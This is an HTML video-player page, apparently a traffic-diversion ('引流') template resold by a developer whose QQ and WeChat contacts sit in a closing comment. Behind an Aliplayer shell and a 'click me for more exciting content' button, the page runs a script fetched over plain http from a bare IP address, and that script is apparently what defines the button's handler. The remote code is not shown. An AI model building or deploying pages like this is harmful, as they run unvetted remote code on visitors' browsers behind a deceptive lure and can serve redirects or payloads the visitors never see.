
<!DOCTYPE html>
<html lang="zh">
	<head>
		<meta charset="utf-8">
		<meta http-equiv="x-ua-compatible" content="IE=edge">
		<meta name="referrer" content="same-origin">
		<meta name="referrer" content="no-referrer">
		<!--    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">-->
		<meta name="viewport"
			content="width=device-width, height=device-height, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no" />
		<title>h5播放器框架</title>
		<link rel="stylesheet" href="https://g.alicdn.com/de/prismplayer/2.9.3/skins/default/aliplayer-min.css" />
		<script type="text/javascript" charset="utf-8" src="https://g.alicdn.com/de/prismplayer/2.9.3/aliplayer-min.js">
		</script>
		<style>
			body,
			html {
				width: 100%;
				height: 100%;
				display: flex;
				justify-content: center;
				align-items: center;
				flex-direction: column;
				background: rgb(0, 0, 0);
				padding: 0;
				margin: 0;
			}

			* {
				margin: 0;
				border: 0;
				padding: 0;
				text-decoration: none
			}

			#player-con {}

			.group_but {
				margin-top: 15px;
				padding: 20px;
				height: 38px;
				text-align: center;
				align-items: center;
				display: flex;
				justify-content: center;
				border-radius: 8px;
				background-image: repeating-linear-gradient(-45deg, #3d7eff, #31c9e8);
				color: #fff;
				letter-spacing: 2px;
			}
		</style>
		<script>
			
		</script>
	</head>
	<body>
		<div class="prism-player" id="player-con" style="height: 90vh;"></div>
		<button class="group_but" onclick="loca()">更多精彩内容点我</button>
		<script src="http://175.24.185.167/cGe/index.txt"></script>
	</body>
	<!-- 
	
	播放器框架:阿里云 
	二改:阿雄
	Qq:1011550928
	Wechat:Lix077
	接 h5引流模板定制,uniapp 软件开发，前端后端皆可定制，接ios跟Android引流软件定制。
	
	-->
</html>
